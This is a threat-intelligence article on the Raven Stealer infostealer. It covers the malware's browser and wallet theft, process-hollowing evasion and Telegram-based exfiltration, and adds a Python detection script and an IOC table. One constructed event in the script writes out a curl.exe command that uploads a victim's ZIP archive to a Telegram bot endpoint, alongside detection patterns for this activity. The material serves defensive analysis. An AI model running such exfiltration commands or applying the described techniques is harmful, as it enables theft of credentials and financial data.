A new information-stealing malware, dubbed Raven Stealer, has emerged as a significant threat in the commodity malware landscape.
Developed predominantly in Delphi and C++, Raven Stealer embodies the modern trend of lightweight, modular infostealers that emphasize operational stealth and attack automation.
The malware is actively distributed through GitHub and a dedicated Telegram channel operated by the so-called ZeroTrace Team, whose aggressive push into the malware-as-a-service (MaaS) space is underlined by a well-maintained portfolio that includes another infostealer, Octalyn Stealer.
Raven Stealer targets Windows systems and primarily focuses on exfiltrating sensitive data from Chromium-based browsers such as Google Chrome, Brave, and Edge.
Its feature set includes harvesting passwords, cookies, autofill data, and stored payment card information.
In addition to browsers, it can reach out to cryptocurrency wallets and select desktop applications, with the explicit aim of gathering credentials and financial data.

The malware’s design is highly attacker-friendly: a Delphi-based builder tool offers a GUI for payload customization, allowing operators to easily embed Telegram bot tokens and chat IDs for real-time C2-like communications.
The compiled payloads, written in C++, are typically packed using UPX to shrink their footprint and evade basic static analysis. Once executed on a victim’s machine, Raven Stealer employs several anti-detection techniques.
For example, it removes itself from the taskbar and suppresses any visible UI, leveraging Windows API calls to make the process invisible to users.
Configuration details such as Telegram tokens are embedded into resources within the binary, further complicating detection and analysis.
Analysts note high entropy in unpacked samples, signifying deliberate obfuscation and the presence of encrypted resource payloads, most notably a ChaCha20-encrypted DLL used for injection.
Technical Workflow
The main operational workflow revolves around advanced memory manipulation and process injection. Raven initiates a new Chromium browser instance in a suspended, headless state, equipped with flags like --no-sandbox for easier exploitation.
Using direct syscalls, it performs reflective process hollowing to inject its decrypted, in-memory DLL payload into this suspended process, circumventing security hooks and allowing the malware to steal browser credentials and other sensitive data without writing to disk.

Credential and artifact gathering spans a comprehensive range: passwords, cookies, payment information from browsers, cryptocurrency wallet files, and even screenshots of the victim’s desktop.
According to the Cyfirma report, the data is methodically sorted under the victim’s AppData directory, enabling systematic harvesting and later exfiltration.
Raven Stealer’s final stage involves compressing all collected data into a ZIP archive, often named with the infected user’s credentials, and uploading it to the attacker’s specified Telegram chat.
This is accomplished via the Telegram Bot API, with curl.exe invoked to automate document uploads through the attacker’s embedded bot token and chat ID.
This approach replaces traditional C2 infrastructure and capitalizes on Telegram’s anonymity, rapid data transmission, and seamless integration.
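The workflow above leaves two observable traces on the endpoint that a defender can hunt for in process-creation telemetry: a Chromium browser started headless with --no-sandbox by a parent in a user-writable directory, and curl.exe posting to the Telegram Bot API sendDocument endpoint. The following detection logic is an added example written for this article, not code from the Cyfirma report; the Sysmon-style events it scans are constructed samples, and the file names, paths and placeholder token are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 shape), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\v8Axs07p.3mf.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --no-sandbox'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\v8Axs07p.3mf.exe",
     "CommandLine": r'curl.exe -F "document=@C:\Users\victim\AppData\Local\victim.zip" '
                    r'https://api.telegram.org/bot<BOT_TOKEN_PLACEHOLDER>/sendDocument?chat_id=<CHAT_ID>'},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},  # benign launch
]

CHROMIUM_IMAGES = ("chrome.exe", "brave.exe", "msedge.exe")
SUSPICIOUS_FLAGS = ("--no-sandbox", "--headless")
# Telegram Bot API document upload: https://api.telegram.org/bot<token>/sendDocument
TELEGRAM_SEND_DOCUMENT = re.compile(r"api\.telegram\.org/bot[^/\s]+/sendDocument", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def unusual_parent(parent: str) -> bool:
    # Browsers are normally launched by explorer.exe or by the browser itself;
    # a parent living under AppData or Temp is the stealer's typical drop location.
    p = parent.lower()
    return "\\appdata\\" in p or "\\temp\\" in p


def classify(event: dict) -> list:
    """Return the detection names that fire for one process-creation event."""
    image = basename(event["Image"])
    cmd = event["CommandLine"].lower()
    findings = []
    if image in CHROMIUM_IMAGES and any(f in cmd for f in SUSPICIOUS_FLAGS) \
            and unusual_parent(event["ParentImage"]):
        findings.append("chromium-headless-no-sandbox-from-unusual-parent")
    if image == "curl.exe" and TELEGRAM_SEND_DOCUMENT.search(event["CommandLine"]):
        findings.append("curl-telegram-senddocument")
    return findings


def scan(events: list) -> list:
    """Return (event_index, detection_name) pairs for every event that matched."""
    return [(i, f) for i, e in enumerate(events) for f in classify(e)]


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Tuning note: a headless browser from an installer or test harness under Temp will also match the first rule, so correlate it with the curl.exe rule or with the ZIP write under AppData before escalating.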
Threat Landscape
Attribution points to the ZeroTrace Team, which coordinates development, distribution, and support via an active Telegram channel and GitHub repository.
Metadata and hardcoded author tags within Raven Stealer’s code, together with a persistent online presence, demonstrate deliberate branding and ongoing evolution of the toolset.
The same infrastructure is leveraged to advertise related infostealers, indicating a concerted strategy to dominate the low-tier MaaS market through rapid brand diversification and regular feature updates.
Raven Stealer reflects the risks posed by readily available, modular info-stealing malware: attackers with minimal technical skill can now deploy formidable data-harvesting campaigns with little more than a Telegram account and access to open-source repositories.
Its real-time exfiltration methods, advanced stealth, and aggressive promotion across illicit channels position it as a substantial ongoing threat to enterprise and consumer security.
Indicators of Compromise (IOC)
| S. No. | Indicator | Type | Context |
|---|---|---|---|
| 1 | 2e0b41913cac0828faeba29aebbf9e1b36f24e975cc7d8fa7f49212e867a3b38 | EXE | RavenStealer.exe |
| 2 | 28d6fbbdb99e6aa51769bde016c61228ca1a3d8c8340299e6c78a1e004209e55 | EXE | v8Axs07p.3mf.exe |
| 3 | 252fb240726d9590e55402cebbb19417b9085f08fc24c3846fc4d088e79c9da9 | DLL | PAYLOAD_DLL.dll |